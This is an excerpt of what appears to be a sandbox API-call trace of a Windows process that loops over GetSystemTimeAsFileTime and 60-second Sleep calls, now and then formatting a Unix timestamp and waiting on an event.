	[0240.209] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76e1a480, dwHighDateTime=0x1d50a6a)) 
	[0240.209] Sleep (dwMilliseconds=0xea60) 
	[0240.225] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76e405e0, dwHighDateTime=0x1d50a6a)) 
	[0240.225] Sleep (dwMilliseconds=0xea60) 
	[0240.242] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76e66740, dwHighDateTime=0x1d50a6a)) 
	[0240.242] Sleep (dwMilliseconds=0xea60) 
	[0240.258] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76e8c8a0, dwHighDateTime=0x1d50a6a)) 
	[0240.259] Sleep (dwMilliseconds=0xea60) 
	[0240.272] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76eb2a00, dwHighDateTime=0x1d50a6a)) 
	[0240.272] Sleep (dwMilliseconds=0xea60) 
	[0240.289] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76ed8b60, dwHighDateTime=0x1d50a6a)) 
	[0240.289] Sleep (dwMilliseconds=0xea60) 
	[0240.303] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76efecc0, dwHighDateTime=0x1d50a6a)) 
	[0240.303] Sleep (dwMilliseconds=0xea60) 
	[0240.322] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76f24e20, dwHighDateTime=0x1d50a6a)) 
	[0240.322] Sleep (dwMilliseconds=0xea60) 
	[0240.334] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76f4af80, dwHighDateTime=0x1d50a6a)) 
	[0240.334] Sleep (dwMilliseconds=0xea60) 
	[0240.350] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76f710e0, dwHighDateTime=0x1d50a6a)) 
	[0240.350] Sleep (dwMilliseconds=0xea60) 
	[0240.367] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x76f97240, dwHighDateTime=0x1d50a6a)) 
	[0240.367] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557890014\r\n") returned 12
	[0240.367] ResetEvent (hEvent=0xc) returned 1
	[0240.367] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0242.876] Sleep (dwMilliseconds=0xea60) 
	[0242.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7878afa0, dwHighDateTime=0x1d50a6a)) 
	[0242.877] Sleep (dwMilliseconds=0xea60) 
	[0242.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x787b1100, dwHighDateTime=0x1d50a6a)) 
	[0242.893] Sleep (dwMilliseconds=0xea60) 
	[0242.908] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x787d7260, dwHighDateTime=0x1d50a6a)) 
	[0242.908] Sleep (dwMilliseconds=0xea60) 
	[0242.924] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x787fd3c0, dwHighDateTime=0x1d50a6a)) 
	[0242.924] Sleep (dwMilliseconds=0xea60) 
	[0242.940] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78823520, dwHighDateTime=0x1d50a6a)) 
	[0242.940] Sleep (dwMilliseconds=0xea60) 
	[0242.955] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78849680, dwHighDateTime=0x1d50a6a)) 
	[0242.955] Sleep (dwMilliseconds=0xea60) 
	[0242.971] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7886f7e0, dwHighDateTime=0x1d50a6a)) 
	[0242.971] Sleep (dwMilliseconds=0xea60) 
	[0242.986] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78895940, dwHighDateTime=0x1d50a6a)) 
	[0242.986] Sleep (dwMilliseconds=0xea60) 
	[0243.002] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x788bbaa0, dwHighDateTime=0x1d50a6a)) 
	[0243.002] Sleep (dwMilliseconds=0xea60) 
	[0243.017] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x788e1c00, dwHighDateTime=0x1d50a6a)) 
	[0243.017] Sleep (dwMilliseconds=0xea60) 
	[0243.033] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78907d60, dwHighDateTime=0x1d50a6a)) 
	[0243.033] Sleep (dwMilliseconds=0xea60) 
	[0243.048] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7892dec0, dwHighDateTime=0x1d50a6a)) 
	[0243.049] Sleep (dwMilliseconds=0xea60) 
	[0243.064] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78954020, dwHighDateTime=0x1d50a6a)) 
	[0243.064] Sleep (dwMilliseconds=0xea60) 
	[0243.080] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7897a180, dwHighDateTime=0x1d50a6a)) 
	[0243.080] Sleep (dwMilliseconds=0xea60) 
	[0243.095] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x789a02e0, dwHighDateTime=0x1d50a6a)) 
	[0243.095] Sleep (dwMilliseconds=0xea60) 
	[0243.111] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x789c6440, dwHighDateTime=0x1d50a6a)) 
	[0243.111] Sleep (dwMilliseconds=0xea60) 
	[0243.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x789ec5a0, dwHighDateTime=0x1d50a6a)) 
	[0243.127] Sleep (dwMilliseconds=0xea60) 
	[0243.143] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78a12700, dwHighDateTime=0x1d50a6a)) 
	[0243.143] Sleep (dwMilliseconds=0xea60) 
	[0243.158] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78a38860, dwHighDateTime=0x1d50a6a)) 
	[0243.158] Sleep (dwMilliseconds=0xea60) 
	[0243.190] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78a84b20, dwHighDateTime=0x1d50a6a)) 
	[0243.190] Sleep (dwMilliseconds=0xea60) 
	[0243.236] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78af6f40, dwHighDateTime=0x1d50a6a)) 
	[0243.236] Sleep (dwMilliseconds=0xea60) 
	[0243.252] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78b1d0a0, dwHighDateTime=0x1d50a6a)) 
	[0243.252] Sleep (dwMilliseconds=0xea60) 
	[0243.267] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78b43200, dwHighDateTime=0x1d50a6a)) 
	[0243.267] Sleep (dwMilliseconds=0xea60) 
	[0243.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78b69360, dwHighDateTime=0x1d50a6a)) 
	[0243.282] Sleep (dwMilliseconds=0xea60) 
	[0243.298] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78b8f4c0, dwHighDateTime=0x1d50a6a)) 
	[0243.298] Sleep (dwMilliseconds=0xea60) 
	[0243.314] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78bb5620, dwHighDateTime=0x1d50a6a)) 
	[0243.314] Sleep (dwMilliseconds=0xea60) 
	[0243.330] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.330] Sleep (dwMilliseconds=0xea60) 
	[0243.345] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78c018e0, dwHighDateTime=0x1d50a6a)) 
	[0243.345] Sleep (dwMilliseconds=0xea60) 
	[0243.361] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78c27a40, dwHighDateTime=0x1d50a6a)) 
	[0243.361] Sleep (dwMilliseconds=0xea60) 
	[0243.376] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78c4dba0, dwHighDateTime=0x1d50a6a)) 
	[0243.376] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557891817\r\n") returned 12
	[0243.376] ResetEvent (hEvent=0xc) returned 1
	[0243.376] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0243.378] Sleep (dwMilliseconds=0xea60) 
	[0243.392] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78c73d00, dwHighDateTime=0x1d50a6a)) 
	[0243.392] Sleep (dwMilliseconds=0xea60) 
	[0243.408] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78c99e60, dwHighDateTime=0x1d50a6a)) 
	[0243.408] Sleep (dwMilliseconds=0xea60) 
	[0243.423] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78cbffc0, dwHighDateTime=0x1d50a6a)) 
	[0243.423] Sleep (dwMilliseconds=0xea60) 
	[0243.439] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78ce6120, dwHighDateTime=0x1d50a6a)) 
	[0243.439] Sleep (dwMilliseconds=0xea60) 
	[0243.455] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78d0c280, dwHighDateTime=0x1d50a6a)) 
	[0243.455] Sleep (dwMilliseconds=0xea60) 
	[0243.472] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78d323e0, dwHighDateTime=0x1d50a6a)) 
	[0243.472] Sleep (dwMilliseconds=0xea60) 
	[0243.486] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78d58540, dwHighDateTime=0x1d50a6a)) 
	[0243.486] Sleep (dwMilliseconds=0xea60) 
	[0243.502] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78d7e6a0, dwHighDateTime=0x1d50a6a)) 
	[0243.502] Sleep (dwMilliseconds=0xea60) 
	[0243.516] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78da4800, dwHighDateTime=0x1d50a6a)) 
	[0243.517] Sleep (dwMilliseconds=0xea60) 
	[0243.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78dca960, dwHighDateTime=0x1d50a6a)) 
	[0243.532] Sleep (dwMilliseconds=0xea60) 
	[0243.548] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78df0ac0, dwHighDateTime=0x1d50a6a)) 
	[0243.548] Sleep (dwMilliseconds=0xea60) 
	[0243.563] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78e16c20, dwHighDateTime=0x1d50a6a)) 
	[0243.563] Sleep (dwMilliseconds=0xea60) 
	[0243.579] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78e3cd80, dwHighDateTime=0x1d50a6a)) 
	[0243.579] Sleep (dwMilliseconds=0xea60) 
	[0243.594] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78e62ee0, dwHighDateTime=0x1d50a6a)) 
	[0243.594] Sleep (dwMilliseconds=0xea60) 
	[0243.610] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78e89040, dwHighDateTime=0x1d50a6a)) 
	[0243.610] Sleep (dwMilliseconds=0xea60) 
	[0243.626] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78eaf1a0, dwHighDateTime=0x1d50a6a)) 
	[0243.626] Sleep (dwMilliseconds=0xea60) 
	[0243.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78ed5300, dwHighDateTime=0x1d50a6a)) 
	[0243.642] Sleep (dwMilliseconds=0xea60) 
	[0243.657] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78efb460, dwHighDateTime=0x1d50a6a)) 
	[0243.657] Sleep (dwMilliseconds=0xea60) 
	[0243.673] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78f215c0, dwHighDateTime=0x1d50a6a)) 
	[0243.673] Sleep (dwMilliseconds=0xea60) 
	[0243.689] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78f47720, dwHighDateTime=0x1d50a6a)) 
	[0243.689] Sleep (dwMilliseconds=0xea60) 
	[0243.704] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78f6d880, dwHighDateTime=0x1d50a6a)) 
	[0243.704] Sleep (dwMilliseconds=0xea60) 
	[0243.720] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78f939e0, dwHighDateTime=0x1d50a6a)) 
	[0243.720] Sleep (dwMilliseconds=0xea60) 
	[0243.737] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78fb9b40, dwHighDateTime=0x1d50a6a)) 
	[0243.737] Sleep (dwMilliseconds=0xea60) 
	[0243.751] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x78fdfca0, dwHighDateTime=0x1d50a6a)) 
	[0243.751] Sleep (dwMilliseconds=0xea60) 
	[0243.766] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79005e00, dwHighDateTime=0x1d50a6a)) 
	[0243.766] Sleep (dwMilliseconds=0xea60) 
	[0243.782] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7902bf60, dwHighDateTime=0x1d50a6a)) 
	[0243.782] Sleep (dwMilliseconds=0xea60) 
	[0243.798] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x790520c0, dwHighDateTime=0x1d50a6a)) 
	[0243.798] Sleep (dwMilliseconds=0xea60) 
	[0243.813] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79078220, dwHighDateTime=0x1d50a6a)) 
	[0243.813] Sleep (dwMilliseconds=0xea60) 
	[0243.828] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7909e380, dwHighDateTime=0x1d50a6a)) 
	[0243.828] Sleep (dwMilliseconds=0xea60) 
	[0243.844] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x790c44e0, dwHighDateTime=0x1d50a6a)) 
	[0243.844] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557893618\r\n") returned 12
	[0243.844] ResetEvent (hEvent=0xc) returned 1
	[0243.844] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0243.861] Sleep (dwMilliseconds=0xea60) 
	[0243.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x791107a0, dwHighDateTime=0x1d50a6a)) 
	[0243.903] Sleep (dwMilliseconds=0xea60) 
	[0243.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7915ca60, dwHighDateTime=0x1d50a6a)) 
	[0243.907] Sleep (dwMilliseconds=0xea60) 
	[0243.922] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79182bc0, dwHighDateTime=0x1d50a6a)) 
	[0243.922] Sleep (dwMilliseconds=0xea60) 
	[0243.938] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x791a8d20, dwHighDateTime=0x1d50a6a)) 
	[0243.938] Sleep (dwMilliseconds=0xea60) 
	[0243.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x791cee80, dwHighDateTime=0x1d50a6a)) 
	[0243.954] Sleep (dwMilliseconds=0xea60) 
	[0243.969] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x791f4fe0, dwHighDateTime=0x1d50a6a)) 
	[0243.969] Sleep (dwMilliseconds=0xea60) 
	[0243.985] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7921b140, dwHighDateTime=0x1d50a6a)) 
	[0243.985] Sleep (dwMilliseconds=0xea60) 
	[0244.031] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7928d560, dwHighDateTime=0x1d50a6a)) 
	[0244.031] Sleep (dwMilliseconds=0xea60) 
	[0244.047] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x792b36c0, dwHighDateTime=0x1d50a6a)) 
	[0244.047] Sleep (dwMilliseconds=0xea60) 
	[0244.063] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x792d9820, dwHighDateTime=0x1d50a6a)) 
	[0244.063] Sleep (dwMilliseconds=0xea60) 
	[0244.078] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x792ff980, dwHighDateTime=0x1d50a6a)) 
	[0244.078] Sleep (dwMilliseconds=0xea60) 
	[0244.094] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79325ae0, dwHighDateTime=0x1d50a6a)) 
	[0244.094] Sleep (dwMilliseconds=0xea60) 
	[0244.109] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7934bc40, dwHighDateTime=0x1d50a6a)) 
	[0244.109] Sleep (dwMilliseconds=0xea60) 
	[0244.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79371da0, dwHighDateTime=0x1d50a6a)) 
	[0244.126] Sleep (dwMilliseconds=0xea60) 
	[0244.140] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.141] Sleep (dwMilliseconds=0xea60) 
	[0244.156] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x793be060, dwHighDateTime=0x1d50a6a)) 
	[0244.156] Sleep (dwMilliseconds=0xea60) 
	[0244.181] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x793e41c0, dwHighDateTime=0x1d50a6a)) 
	[0244.181] Sleep (dwMilliseconds=0xea60) 
	[0244.188] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7940a320, dwHighDateTime=0x1d50a6a)) 
	[0244.188] Sleep (dwMilliseconds=0xea60) 
	[0244.203] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79430480, dwHighDateTime=0x1d50a6a)) 
	[0244.203] Sleep (dwMilliseconds=0xea60) 
	[0244.219] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x794565e0, dwHighDateTime=0x1d50a6a)) 
	[0244.219] Sleep (dwMilliseconds=0xea60) 
	[0244.234] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7947c740, dwHighDateTime=0x1d50a6a)) 
	[0244.234] Sleep (dwMilliseconds=0xea60) 
	[0244.250] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x794a28a0, dwHighDateTime=0x1d50a6a)) 
	[0244.250] Sleep (dwMilliseconds=0xea60) 
	[0244.266] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x794c8a00, dwHighDateTime=0x1d50a6a)) 
	[0244.266] Sleep (dwMilliseconds=0xea60) 
	[0244.281] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x794eeb60, dwHighDateTime=0x1d50a6a)) 
	[0244.281] Sleep (dwMilliseconds=0xea60) 
	[0244.297] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79514cc0, dwHighDateTime=0x1d50a6a)) 
	[0244.297] Sleep (dwMilliseconds=0xea60) 
	[0244.313] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7953ae20, dwHighDateTime=0x1d50a6a)) 
	[0244.313] Sleep (dwMilliseconds=0xea60) 
	[0244.328] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79560f80, dwHighDateTime=0x1d50a6a)) 
	[0244.328] Sleep (dwMilliseconds=0xea60) 
	[0244.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x795870e0, dwHighDateTime=0x1d50a6a)) 
	[0244.344] Sleep (dwMilliseconds=0xea60) 
	[0244.359] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x795ad240, dwHighDateTime=0x1d50a6a)) 
	[0244.359] Sleep (dwMilliseconds=0xea60) 
	[0244.375] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x795d33a0, dwHighDateTime=0x1d50a6a)) 
	[0244.375] Sleep (dwMilliseconds=0xea60) 
	[0244.390] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x795f9500, dwHighDateTime=0x1d50a6a)) 
	[0244.390] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557895478\r\n") returned 12
	[0244.390] ResetEvent (hEvent=0xc) returned 1
	[0244.390] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0244.392] Sleep (dwMilliseconds=0xea60) 
	[0244.406] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7961f660, dwHighDateTime=0x1d50a6a)) 
	[0244.406] Sleep (dwMilliseconds=0xea60) 
